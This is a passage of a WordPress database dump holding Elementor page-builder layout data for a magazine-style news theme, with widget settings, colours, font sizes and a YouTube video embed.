responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"sxv5g6k\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=qV8zMH-qeBc\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1315,462,'_elementor_version','0.4'),(1316,462,'_elementor_css','a:3:{s:4:\"time\";i:1508895310;s:5:\"fonts\";a:1:{i:0;s:6:\"Tahoma\";}s:6:\"status\";s:4:\"file\";}'),(1318,360,'_oembed_50134ca05aad6c19f353cfb3d69ea8e4','<iframe width=\"1200\" height=\"675\" src=\"https://www.youtube.com/embed/qV8zMH-qeBc?feature=oembed\" frameborder=\"0\" gesture=\"media\" allowfullscreen></iframe>'),(1319,360,'_oembed_time_50134ca05aad6c19f353cfb3d69ea8e4','1508911603'),(1320,463,'_elementor_edit_mode','builder'),(1321,463,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_si